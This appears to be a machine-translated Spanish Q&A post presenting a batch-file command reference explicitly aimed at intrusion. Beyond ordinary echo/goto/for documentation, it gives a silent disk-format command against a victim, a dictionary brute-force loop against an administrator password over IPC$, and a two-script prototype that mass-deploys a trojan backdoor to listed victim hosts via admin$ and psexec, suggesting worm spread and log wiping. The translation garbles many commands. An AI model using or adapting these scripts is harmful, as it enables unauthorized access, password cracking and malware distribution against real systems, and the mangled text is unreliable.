Red de conocimiento informático - Aprendizaje de código fuente - Enciclopedia de códigos de uso común para archivos BAT. Si es bueno, puedo agregar algunos.

Enciclopedia de códigos de uso común para archivos BAT. Si es bueno, puedo agregar algunos.

Espero que ayude.

1. Comando Echo

Activa o desactiva el eco, o muestra información. Sin argumentos, el comando echo muestra la configuración de eco actual.

Sintaxis

echo[{ on | off }][Mensaje]

Ejemplo: echo off/echo hola mundo

En la actualidad En la aplicación, usaremos este comando y símbolos de redirección (también llamados símbolos de canalización, generalmente >; gt gt) para ingresar algunos comandos en archivos en un formato específico. Esto se reflejará en ejemplos futuros.

2.@command

Esto significa que el comando después de @ no se mostrará. Durante el proceso de intrusión (como formatear el disco duro del enemigo mediante procesamiento por lotes), naturalmente no puedes permitir que la otra parte vea los comandos que utilizas.

Ejemplo: @echo off

@echo está inicializando el programa, espere...

@formatexx:/q/u/autoset (El formato es not Está permitido utilizar el parámetro /y. Afortunadamente, Microsoft nos ha dejado un parámetro autoset, que tiene el mismo efecto que /y..)

3. Especifica el salto a la etiqueta. Una vez que se encuentra la etiqueta, el programa comenzará a procesar comandos desde la siguiente línea.

Sintaxis: ir a etiqueta (la etiqueta es un parámetro que especifica la línea a la que ir en el programa por lotes).

Ejemplo:

if {1} = ={}Ir a noparms

If {2} = {} gotonoparms (Si no comprende If, ​​1, 2 aquí, omítalo primero; habrá una explicación detallada más adelante).

@Rem verifica los parámetros y muestra el uso si está vacío

: noparms

uso de eco: monitor.bat Número de puerto IP del servidor

Ir a al final

El nombre de la etiqueta se puede elegir arbitrariamente, pero es mejor que tenga letras significativas. Agregar un : antes de una letra indica que la letra es una etiqueta. El comando ir a se basa en esto: busque el siguiente paso y salte allí. Será mejor que tengas alguna explicación para que otros entiendan tu intención.

4.Comando Rem

El comando de comentario es equivalente a /*-*/ en lenguaje C. No se ejecutará, solo sirve como comentario para facilitar que otros lo lean y modifiquen en el futuro.

Mensaje remoto

Muestra: @RemAquí está la descripción.

5. Comando de pausa

Al ejecutar el comando de pausa, se mostrará el siguiente mensaje:

Presione cualquier tecla para continuar. . .

Muestra:

@apagar eco

: iniciar

Copiar a: *. *d:\return

echo, coloque un disco nuevo en el controlador A

abortar

ir al inicio

En este caso, todos Los archivos del disco en la unidad A se copian en d:\back. Aparece un mensaje que le solicita que coloque otro disco en la unidad A. El comando de pausa pausará el programa para que pueda reemplazar el disco y presionar cualquier tecla para continuar con el procesamiento.

6. Llamar comando

Llame a un programa por lotes desde otro programa por lotes sin finalizar el programa por lotes principal. El comando de llamada acepta una etiqueta que se utilizará como destino de la llamada. Si utiliza Llamar fuera de un script o archivo por lotes, no funcionará en la línea de comando.

Sintaxis

Llamar a [[unidad:] [ruta] nombre de archivo [parámetros de lote]] [: etiqueta [parámetros]]

Parámetros

[unidad:}[ruta]nombre de archivo

Especifica la ubicación y el nombre del programa por lotes que se llamará. El parámetro de nombre de archivo debe tener un .bat o .bat. extensión cmd.

7. Comando de inicio

Llamar a programas externos Todos los comandos de DOS y programas de línea de comandos se pueden llamar a través del comando de inicio.

Parámetros de intrusión comunes:

Minimizar la ventana comenzando con MIN

Iniciar un programa de Windows de 16 bits en un espacio separado.

Alto inicia aplicaciones en categorías de alta prioridad.

Inicie aplicaciones en la categoría de prioridad en tiempo real en tiempo real.

WAIT inicia la aplicación y espera a que finalice.

Parámetros Estos son los parámetros pasados ​​al comando/programa.

Cuando la aplicación en ejecución es una aplicación GUI de 32 bits, CMD.EXE volverá al símbolo del sistema sin esperar a que finalice la aplicación. Este nuevo comportamiento no ocurrirá si se ejecuta dentro de un script de comando.

8. Seleccione Comando

Seleccione Usar este comando para permitir al usuario ingresar un carácter para ejecutar diferentes comandos. Al usarlo, agregue el parámetro /c: y escriba caracteres que se puedan ingresar después de c:, sin espacios en el medio. Su código de retorno es 1234...

Por ejemplo: elección /c:dme defrag,mem,end

se mostrará

defrag,mem,end [D,M,E]?

Muestra:

El contenido de Sample.bat es el siguiente:

@apagar eco

elección /c: desfragmentación dme , mem, end

Si el nivel de error es 3, vaya a la desfragmentación (el código de error con el valor más alto debe juzgarse primero)

Si el nivel de error es 2, vaya a la memoria

Si el error es Nivel 1, vaya al final

: Desfragmentación

c:\dos\defrag

Ir al final

: Memoria

Memoria

Ir al final

: Fin

Echo Adiós

Después de ejecutar este archivo, se mostrará la desfragmentación, mem,end[D,M,E]? El usuario puede seleccionar d m e, y luego la declaración if emitirá un juicio. d significa ejecutar la sección del programa marcada como defrag, M significa ejecutar la sección del programa marcada como mem y E significa ejecutar la sección del programa marcada como final. Cada segmento del programa saltará a la etiqueta final con goto end al final, y luego el programa mostrará adiós y el archivo finalizará.

9.Comando If

Si significa que determinará si se cumplen las condiciones especificadas y luego decidirá ejecutar diferentes comandos. Hay tres formatos:

1. Si se ejecuta el comando "parámetro" == "cadena"

Si el parámetro es igual a la cadena especificada, la condición es verdadera. Ejecute el comando; de lo contrario, ejecute la siguiente oración. (Tenga en cuenta los dos signos iguales)

Por ejemplo, si "1"=="a" da formato a:

if {1}=={}vaya a noparms

if {2}=={}ir a noparms

2. Si el nombre del archivo existe, es el comando a ejecutar.

Si hay un archivo específico y la condición es verdadera, ejecute el comando; de lo contrario, ejecute la siguiente oración.

Por ejemplo, si existe config . sys edite config .

3. Comando numérico a ejecutar si nivel de error/si no nivel de error.

Si el código de retorno es igual al número especificado, la condición es verdadera y se ejecuta el comando; de lo contrario, se ejecuta la siguiente oración.

Por ejemplo si el nivel de error 2 pasa a x2.

Cuando se ejecuta un programa de DOS, devolverá un número a DOS. Este número se denomina nivel de error o código de retorno. Los códigos de retorno comunes son 0,1.

10. Comando For

El comando for es un comando complejo, utilizado principalmente para ejecutar comandos cíclicamente dentro de un rango específico.

Cuando utilice el comando FOR en un archivo por lotes, utilice variable para especificar la variable.

para { variable | variable } en(set)do comando [CommandLineOptions]

variable especifica un parámetro reemplazable de una sola letra.

(set)Especifica un archivo o un grupo de archivos. Se pueden utilizar caracteres comodín.

Comando especifica el comando que se ejecutará para cada archivo.

Command-parameters especifica parámetros o modificadores de línea de comando para comandos específicos.

Cuando utilice el comando FOR en un archivo por lotes, utilice variable para especificar la variable.

En lugar de una variable. Los nombres de las variables distinguen entre mayúsculas y minúsculas, por lo que i es diferente de i.

Si las extensiones de comando están habilitadas, los siguientes formatos de comando FOR adicionales se ven afectados

Compatible:

Variable FOR/D IN (establecer) comando DO [comando- Parámetros]

Si la colección contiene comodines, especifica que coincide con nombres de directorios en lugar de archivos.

Coincidencias de nombres.

FOR/R[[unidad:]ruta] variable IN(set)DO comando[comando-

Compruebe el árbol de directorios con raíz en [unidad:]ruta y apunte a cada uno en un directorio.

Para declaraciones, si no se especifica ningún directorio después de /R, se utiliza el directorio actual.

Directorio. Si el conjunto es solo un carácter de punto (.), se enumera el árbol de directorios.

Variable FOR/L IN (inicio, paso, fin) comando DO [command-para

Este conjunto representa una serie de números que aumentan de principio a fin.

Por tanto, (1, 1, 5) producirá la secuencia 1 2 3 4 5 y (5, 1, 1) producirá.

El orden (5 4 3 2 1).

(conjunto de archivos) FOR/F[" opciones "] variable en el comando DO

FOR/F[" opciones "] variable IN ("cadena") comando DO< / p>

Variable FOR/F[" opciones "] en (comando) comando DO

O, si tiene la opción usebackq:

(conjunto de archivos) DO FOR/ F[" opciones "] variable en comando

FOR/F[" opciones "] variable IN ("cadena") DO comando

FOR/F[" opciones " ]Variable en (comando) DO comando

Filenameset es uno o más nombres de archivo. Continúe dentro del conjunto de nombres de archivo.

Cada archivo ha sido abierto, leído y procesado antes que el siguiente.

El procesamiento consiste en leer un archivo, dividirlo en líneas de texto y luego dividir cada línea en

análisis de cero o más símbolos. Luego llame al bucle For usando el valor de la variable de la cadena de símbolos encontrada

. De forma predeterminada, /F está separado por cada línea de cada archivo. El primer carácter de espacio en blanco de

. Salta líneas vacías. Puede anular la operación de análisis predeterminada especificando el parámetro opcional "opciones". Esta cadena entre comillas contiene una o más

palabras clave que especifican diferentes opciones de análisis.

Estas palabras clave son:

eol = c - Indica el carácter de comentario de final de línea (solo uno)

skip = n - Indica el número de líneas a ignorar al comienzo de la archivo.

delims = XXX: representa el conjunto de delimitadores. Esto reemplaza espacios y tabulaciones.

Delimitador predeterminado establecido.

Tokens=x,y,m-n: se refiere a qué token de cada fila se pasa a cada iteración.

Para ti. Esto dará como resultado nombres de variables adicionales.

El formato es un rango. Especifique m con el símbolo enésimo.

El último carácter de la cadena es un asterisco.

Entonces las variables adicionales se resolverán en el último símbolo.

Asigna y acepta texto reservado para esta línea.

usebackq: especifica que la nueva sintaxis se ha utilizado en los siguientes casos:

Después de ejecutar una cadena entre comillas como comando

El carácter de comillas es un literal comando de cadena, está permitido en fi

Encierre el nombre del archivo entre comillas dobles.

Muestra 1:

FOR/F "eol=;tokens=2,3* delims=", en (myfile.txt) do comando

Cada línea en myfile.txt se analizará, ignorando las que comienzan con punto y coma, y

El segundo y tercer símbolo de cada línea se pasarán al cuerpo del programa para usar comas y/o

delimitador de espacio. Tenga en cuenta que las declaraciones en el cuerpo del programa se refieren a i.

Para obtener el segundo símbolo, haga referencia a j para obtener el tercer símbolo, haga referencia a k.

Obtén todos los símbolos restantes después del tercer símbolo. Para nombres de archivos con espacios

debe encerrar el nombre del archivo entre comillas dobles. Para hacer

comillas dobles de esta manera, también necesita usar la opción usebackq; de lo contrario, las comillas dobles

se entenderán que se usan para definir la cadena a ser analizado.

i se declara específicamente en la declaración for, y j y k están dados por.

La opción Tokens= se especifica específicamente. Puedes pasar token = una línea.

Especifique hasta 26 símbolos, siempre y cuando no intente describir símbolos superiores a la letra z o variables superiores

Z, recuerde que las variables FOR son de una sola letra, mayúsculas y minúsculas. -sensible y global;

Al mismo tiempo, no se pueden utilizar más de 52.

También puede utilizar la lógica de análisis FOR /F en cadenas adyacentes.

Encierre el conjunto de nombres de archivos entre paréntesis entre comillas simples. De esta manera, la cadena de caracteres

se trata como una única línea de entrada en el archivo.

Finalmente, puedes usar el comando FOR /F para analizar el resultado de este comando. El método consiste en integrar los nombres de los archivos entre corchetes

en una cadena cerrada. Esta línea

se pasará al CMD.EXE secundario como línea de comando y se capturará su salida.

En memoria y analizado como un archivo. Por lo tanto, aquí hay un ejemplo:

FOR/F " usebackq delims == " I IN(` set `)DO @ echo I

Enumerar las variables de entorno en el nombre del entorno actual .

Además, se ha mejorado la sustitución de referencias de variables. Ahora puede utilizar la siguiente

sintaxis de opción:

~ I: elimine las comillas (") y expanda i.

~ fI: expanda I a Totalmente nombre de ruta calificado

~dI-only I se expande a una letra de unidad

~ pI-only I se expande a una ruta

~nI-. se expandirá a un nombre de archivo

~Solo I se expandirá a una extensión de archivo

~ Las rutas expandidas contienen solo nombres cortos.

~ aI-Expandir I al atributo de archivo del archivo

~ tI-Expandir I a la fecha/hora del archivo

~ zI-Expand I al atributo de archivo del archivo al tamaño del archivo

~$PATH:I - Localice el directorio que aparece en la variable de entorno PATH y expanda i.

Al primer nombre completo encontrado. Si la variable de entorno

no está definida o no se encuentra el archivo, esta combinación de teclas se expandirá.

Línea vacía

Los modificadores se pueden combinar para obtener una variedad de resultados:

~Solo dpI I se expande a una letra de unidad y una ruta.

~nxI-only I se expande al nombre y extensión del archivo.

~ fsI: solo expande I a la ruta completa con el nombre corto.

~ DP $PATH:I - Localice el directorio que aparece en la variable de entorno PATH y expanda i.

Vaya a la primera letra de unidad y ruta encontrada.

~ ftzaI - Expande I a líneas de salida similares a DIR

En el ejemplo anterior, I y PATH se pueden reemplazar con otros valores válidos. ~Sintaxis

Termina con un nombre de variable FOR válido. Elija un nombre de variable en mayúscula similar a i.

Es más fácil de leer y evita confusiones con combinaciones de teclas que no distinguen entre mayúsculas y minúsculas.

Lo anterior es la ayuda oficial de MS. Aquí hay algunos ejemplos para ilustrar el uso del comando For en intrusión.

Muestra 2:

El comando For se utiliza para descifrar la contraseña de fuerza bruta del host Win2k de destino.

Usamos net use \ \ IP \ IPC $ "contraseña" /u: "administrador" para intentar conectarnos al host de destino y anotamos la contraseña después del éxito.

El comando más importante es uno: for/f I in(dict . txt)do net use \ \ IP \ IPC $ "I"/u: "administrador".

I se utiliza para representar la contraseña de administrador. En dict.txt, este valor de i está conectado al comando net use. Luego pase los resultados de ejecución del programa al comando de búsqueda -

for/f I in(dict . txt)do net use \\IP\IPC$ "I"/u:"administrator"|find": comando completado con éxito" > gtD:\ok.txt, que es ko.

Muestra 3:

¿Hay una gran cantidad de pollos de engorde esperando que usted críe caballos de Troya de puerta trasera? Cuando el número es particularmente grande, todo lo que originalmente era feliz se vuelve muy deprimente. Como se mencionó al principio del artículo, el uso de archivos por lotes puede simplificar las tareas rutinarias o repetitivas. Entonces, ¿cómo lograrlo? Jaja, lo entenderás después de leerlo.

Solo hay un comando principal: (Cuando use el comando FOR en un archivo por lotes, use variable para especificar la variable).

@for /f "tokens=1, 2, 3 delims = " Yo en(victim . txt)empiezo a llamar a la puerta I j k

Consulte el uso de. tokens El ejemplo1 anterior se refiere a pasar el contenido de victim.txt a los parámetros i j k de door.bat en orden.

Cultivate.bat no es más que usar el comando net use para establecer una conexión IPC$, copiar la puerta trasera del troyano a la víctima y luego usar devolver copia (si errorlever =) para filtrar el host donde se encuentra el la puerta trasera se implanta correctamente y se emite o se reproduce en el archivo especificado.

Delims= significa que el contenido de vivtim.txt está separado por espacios. Creo que debes entender cómo se ve el contenido de este victim.txt cuando veas esto. Debe organizarse de acuerdo con el objeto representado por i j k, generalmente el nombre de usuario de la contraseña de IP.

Prototipo de código:

-Cortar aquí y guardar como archivo por lotes (yo lo llamo main.bat) -

@apagar echo

@if "1"== " "Ir a uso

@for /f "tokens=1, 2, 3 delims = " Yo en (víctima . txt) comienzo a llamar al IPC hack .bat I j k

@Ir al final

: Uso

@echo Ejecute este lote en modo DOS. O haga doble clic en él.

: Fin

-Cortar aquí, luego guardar como archivo por lotes (lo llamé main.bat) -

-Cortar aquí y luego guardarlo como un archivo por lotes (yo lo llamo door.bat)

@net use \\1\ipc$ 3 /u: "2 "

@if error nivel 1 goto falló

@echo está intentando establecer una conexión IPC... ok

@copy wind RV 32.exe\\1\admin$\system32 amp si no, nivel de error 1 echo IP 1; usuario 2 PWD 3 gt; gtko.txt

@ p * * * EC\\ 1 c:\win nt\system32\win drv 32.exe

@p * * * EC \ \ 1 net start windrv 32 amp; si no, nivel de error 1 echo 1 backdoor gt gtko.txt

: falló

@echo lo siento, no puedo conectarme con la víctima.

-Corte aquí y guárdelo como un archivo por lotes (yo lo llamo door.bat)

Esto es solo un prototipo de un lote de puerta trasera automatizado. Dos programas por lotes y de puerta trasera (Windrv32.exe), psexec. Exe debe colocarse en un directorio unificado. Contenido masivo.

Se puede ampliar, como agregar la función de borrar registros DDOS, agregar la función de agregar usuarios periódicamente y permitir que se propague automáticamente (gusanos) a través de un análisis en profundidad. No es necesario que lo describa aquí. Los amigos que estén interesados ​​pueden hacer su propia investigación.

Acusado: 〆ɑMejorado oち-Asistente Nivel 3 12-1 02:41.

¿Crees que la mejor respuesta es buena? Actualmente hay 0 comentarios.

50 (0)

50 (0)

Otras respuestas*** 5

Los siguientes son comandos de uso común en DOS . Consulte /PC/Newer/OS/DOS/DOS 0301.htm para obtener más detalles.

Cd cambia el directorio actual sys al disco del sistema DOS

Copia el archivo copiado y elimina el archivo

Elimina el nombre del archivo de la columna del directorio del árbol de directorios .

Edición de disco edición de texto

Formatear disco md crear subdirectorio

Ver estado de memoria tipo mostrar contenido del archivo

Rd eliminar directorio tarea Cambiar archivo nombre

Entrevistado: Nordson 1983-Asistente Nivel 2 12-1 02:44.

Enciclopedia de comandos de DOS

/Article/other art/other/200508/1485 html

Investigador: tcj 0-Período de prueba nivel 12 -1 02: 45

Comprobador de archivos del sistema Sfc.exe

Protección de archivos Sfc /scannow-windows

Comando de apagado de cuenta regresiva Tsshutdn-60 segundos

Introducción a tourstartxp (programa touring xp después de la instalación)

Administrador de tareas Taskmgr

Eventvwr-visor de eventos

Programa de creación de palabras Eudcedit

p >

Navegador abierto

Empaquetado de objetos

Programa de monitoreo del rendimiento de la computadora Perfmon.msc

Programador Gerente de proyectos

p>

Registro Regedit.exe

Rsop.msc - Conjunto de resultados de directiva de grupo

Regedt32 - Editor de registro

Rononce -p 15 segundos Cerrar

Regsvr32 /u *. dll detiene la ejecución del archivo dll.

zipfldr.dll elimina la compatibilidad con códigos postales.

Símbolo del sistema Cmd.exeCMD

Chkdsk.exe-Chkdsk Disk Check

Utilidad de administración de certificados Certmgr.msc

Calc- Calculadora de inicio

Mapa de caracteres de inicio de Charmap

Utilidad de red cliente CLICONFG-SQL SERVER

Visor del portapapeles

Conferencia -Iniciar reunión web

Maestría en Gestión Informática

Cleanmgr-Eliminación de Basura

Programa de Servicio de Índice Ciadv.msc

Osk abre el teclado en pantalla.

Odbcad32-ODBC Data Source Manager

Oobe/msoobe /a Compruebe si XP se ha activado.

Usuarios y grupos locales de Lusrmgr.msc

Comando de cierre de sesión

Herramienta de enlace Iexpress-Trojan, viene con el sistema.

Nslookup-Detector de direcciones IP

Fsmgmt.msc-***Disfrute del Administrador de carpetas

Administrador de herramientas auxiliares Utilman

Gpedit.msc -Política de grupo